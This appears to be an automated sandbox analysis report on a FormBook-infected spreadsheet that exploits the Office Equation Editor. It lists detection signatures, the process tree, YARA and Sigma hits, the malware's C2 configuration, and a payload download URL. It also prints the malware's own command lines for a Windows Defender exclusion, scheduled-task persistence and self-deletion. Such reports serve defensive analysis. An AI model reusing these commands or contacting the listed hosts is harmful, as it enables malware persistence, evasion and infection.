Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Payment Details.xlsx

Overview

General Information

Sample Name:Payment Details.xlsx
Analysis ID:528790
MD5:f49e322b837835ac60cad8c173ecff31
SHA1:c7cddfbf865b528d1bbbbe5c5f3974279cc8b6f5
SHA256:ff4e17d62ce9c71164879418e7942cecf8db37b16cb66adebc6c2570840f8524
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Suspicius Add Task From User AppData Temp
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Sigma detected: Powershell Defender Exclusion
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Drops PE files to the user root directory
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2408 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 1268 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 3028 cmdline: "C:\Users\Public\vbc.exe" MD5: 0F88779E9500075DE85E916637305164)
      • powershell.exe (PID: 2728 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • schtasks.exe (PID: 2636 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OmnbtuhFsJys" /XML "C:\Users\user\AppData\Local\Temp\tmpC92A.tmp MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • vbc.exe (PID: 1724 cmdline: C:\Users\Public\vbc.exe MD5: 0F88779E9500075DE85E916637305164)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • rundll32.exe (PID: 1292 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • cmd.exe (PID: 2964 cmdline: /c del "C:\Users\Public\vbc.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.blancheshelley.xyz/g2fg/"], "decoy": ["snowcrash.website", "pointman.us", "newheartvalve.care", "drandl.com", "sandspringsramblers.com", "programagubernamental.online", "boja.us", "mvrsnike.com", "mentallyillmotherhood.com", "facom.us", "programagubernamental.store", "izivente.com", "roller-v.fr", "amazonbioactives.com", "metaverseapple.xyz", "5gt-mobilevsverizon.com", "gtwebsolutions.co", "scottdunn.life", "usdp.trade", "pikmin.run", "cardano-dogs.com", "bf2hgfy.xyz", "teslafoot.com", "rubertquintana.com", "wellsfargroewards.com", "santel.us", "couponatonline.com", "theunitedhomeland.com", "pmstnly.com", "strlocal.com", "shelleysmucker.com", "youser.online", "emansdesign.com", "usnikeshoesbot.top", "starfish.press", "scotwork.us", "metamorgana.com", "onyxbx.net", "rivas.company", "firstcoastalfb.com", "onpurposetraumainformedcare.com", "celimot.xyz", "jecunikepemej.rest", "lenovolatenightit.com", "unitedsterlingcompanyky.com", "safety2venture.us", "facebookismetanow.com", "scottdunn.review", "mentallyillmotherhood.com", "firstincargo.com", "vikavivi.com", "investmenofpairs.club", "nexans.cloud", "farcloud.fr", "ivermectinforhumans.quest", "5gmalesdf.sbs", "majenta.info", "6vvvvvwmetam.top", "metafirstclass.com", "firstcoinnews.com", "btcetffutures.online", "funinfortmyers.com", "mangoirslk.top", "metaversebasicprivacy.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b937:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c93a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18859:$sqlite3step: 68 34 1C 7B E1
    • 0x1896c:$sqlite3step: 68 34 1C 7B E1
    • 0x18888:$sqlite3text: 68 38 2A 90 C5
    • 0x189ad:$sqlite3text: 68 38 2A 90 C5
    • 0x1889b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189c3:$sqlite3blob: 68 53 D8 7F 8C
    0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x26b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x21a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x27b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x292f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x141c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x8937:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x993a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      9.0.vbc.exe.400000.8.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        9.0.vbc.exe.400000.8.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b937:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c93a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        9.0.vbc.exe.400000.8.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18859:$sqlite3step: 68 34 1C 7B E1
        • 0x1896c:$sqlite3step: 68 34 1C 7B E1
        • 0x18888:$sqlite3text: 68 38 2A 90 C5
        • 0x189ad:$sqlite3text: 68 38 2A 90 C5
        • 0x1889b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x189c3:$sqlite3blob: 68 53 D8 7F 8C
        9.2.vbc.exe.400000.2.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          9.2.vbc.exe.400000.2.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b937:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c93a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 16 entries

          Sigma Overview

          Exploits:

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 202.55.132.154, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1268, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1268, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1268, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 3028
          Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
          Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1764, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 1292
          Sigma detected: Suspicius Add Task From User AppData TempShow sources
          Source: Process startedAuthor: frack113: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OmnbtuhFsJys" /XML "C:\Users\user\AppData\Local\Temp\tmpC92A.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OmnbtuhFsJys" /XML "C:\Users\user\AppData\Local\Temp\tmpC92A.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\Public\vbc.exe" , ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 3028, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OmnbtuhFsJys" /XML "C:\Users\user\AppData\Local\Temp\tmpC92A.tmp, ProcessId: 2636
          Sigma detected: Execution from Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1268, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 3028
          Sigma detected: Powershell Defender ExclusionShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\vbc.exe" , ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 3028, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe, ProcessId: 2728
          Sigma detected: Suspicious Rundll32 Without Any CommandLine ParamsShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1764, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 1292
          Sigma detected: Non Interactive PowerShellShow sources
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\vbc.exe" , ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 3028, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe, ProcessId: 2728

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.blancheshelley.xyz/g2fg/"], "decoy": ["snowcrash.website", "pointman.us", "newheartvalve.care", "drandl.com", "sandspringsramblers.com", "programagubernamental.online", "boja.us", "mvrsnike.com", "mentallyillmotherhood.com", "facom.us", "programagubernamental.store", "izivente.com", "roller-v.fr", "amazonbioactives.com", "metaverseapple.xyz", "5gt-mobilevsverizon.com", "gtwebsolutions.co", "scottdunn.life", "usdp.trade", "pikmin.run", "cardano-dogs.com", "bf2hgfy.xyz", "teslafoot.com", "rubertquintana.com", "wellsfargroewards.com", "santel.us", "couponatonline.com", "theunitedhomeland.com", "pmstnly.com", "strlocal.com", "shelleysmucker.com", "youser.online", "emansdesign.com", "usnikeshoesbot.top", "starfish.press", "scotwork.us", "metamorgana.com", "onyxbx.net", "rivas.company", "firstcoastalfb.com", "onpurposetraumainformedcare.com", "celimot.xyz", "jecunikepemej.rest", "lenovolatenightit.com", "unitedsterlingcompanyky.com", "safety2venture.us", "facebookismetanow.com", "scottdunn.review", "mentallyillmotherhood.com", "firstincargo.com", "vikavivi.com", "investmenofpairs.club", "nexans.cloud", "farcloud.fr", "ivermectinforhumans.quest", "5gmalesdf.sbs", "majenta.info", "6vvvvvwmetam.top", "metafirstclass.com", "firstcoinnews.com", "btcetffutures.online", "funinfortmyers.com", "mangoirslk.top", "metaversebasicprivacy.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Payment Details.xlsxVirustotal: Detection: 36%Perma Link
          Source: Payment Details.xlsxReversingLabs: Detection: 33%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 9.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, type: MEMORY
          Antivirus detection for URL or domainShow sources
          Source: http://202.55.132.154/384500000_1/vbc.exeAvira URL Cloud: Label: malware
          Source: www.blancheshelley.xyz/g2fg/Avira URL Cloud: Label: phishing
          Multi AV Scanner detection for domain / URLShow sources
          Source: http://202.55.132.154/384500000_1/vbc.exeVirustotal: Detection: 12%Perma Link
          Source: www.blancheshelley.xyz/g2fg/Virustotal: Detection: 8%Perma Link
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeReversingLabs: Detection: 50%
          Source: C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exeReversingLabs: Detection: 50%
          Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 50%
          Source: 9.2.vbc.exe.706380.3.unpackAvira: Label: TR/ATRAPS.Gen
          Source: 9.2.vbc.exe.30000.0.unpackAvira: Label: TR/ATRAPS.Gen
          Source: 9.0.vbc.exe.400000.10.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.0.vbc.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.0.vbc.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.2.vbc.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, vbc.exe, 00000009.00000003.473074012.0000000000930000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.472123384.00000000007D0000.00000004.00000001.sdmp, vbc.exe, 00000009.00000002.509705783.0000000000C40000.00000040.00000001.sdmp, rundll32.exe
          Source: Binary string: rundll32.pdb source: vbc.exe, 00000009.00000002.508502052.00000000006F9000.00000004.00000020.sdmp, vbc.exe, 00000009.00000002.506009358.0000000000030000.00000040.00020000.sdmp
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: global trafficDNS query: name: www.metafirstclass.com
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 202.55.132.154:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 202.55.132.154:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 52.128.23.153:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 52.128.23.153:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 52.128.23.153:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 52.128.23.153 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.metafirstclass.com
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.blancheshelley.xyz/g2fg/
          Source: Joe Sandbox ViewASN Name: DOSARRESTUS DOSARRESTUS
          Source: Joe Sandbox ViewASN Name: ADTEC-AS-VNADTECMediaJointStockCompanyVN ADTEC-AS-VNADTECMediaJointStockCompanyVN
          Source: global trafficHTTP traffic detected: GET /g2fg/?hZlpd=H/0ZmZGK5jsRiriaZut4CEFQpFY2p/TAFyTzOdFvzC4udK1/lSWrgm9fn/kzXoflvKU/jw==&LRgXx=fbcXTtnx6x HTTP/1.1Host: www.metafirstclass.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 52.128.23.153 52.128.23.153
          Source: Joe Sandbox ViewIP Address: 202.55.132.154 202.55.132.154
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 25 Nov 2021 18:29:20 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.3.31Last-Modified: Thu, 25 Nov 2021 04:42:24 GMTETag: "b0a00-5d19599d2da5b"Accept-Ranges: bytesContent-Length: 723456Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 30 14 9f 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 fe 0a 00 00 0a 00 00 00 00 00 00 7e 1d 0b 00 00 20 00 00 00 20 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2c 1d 0b 00 4f 00 00 00 00 20 0b 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dc fd 0a 00 00 20 00 00 00 fe 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 88 06 00 00 00 20 0b 00 00 08 00 00 00 00 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 0b 00 00 02 00 00 00 08 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 1d 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 ac 48 01 00 b0 21 01 00 03 00 00 00 8c 01 00 06 5c 6a 02 00 d0 b2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 be 02 73 1f 00 00 0a 7d 01 00 00 04 02 73 20 00 00 0a 7d 06 00 00 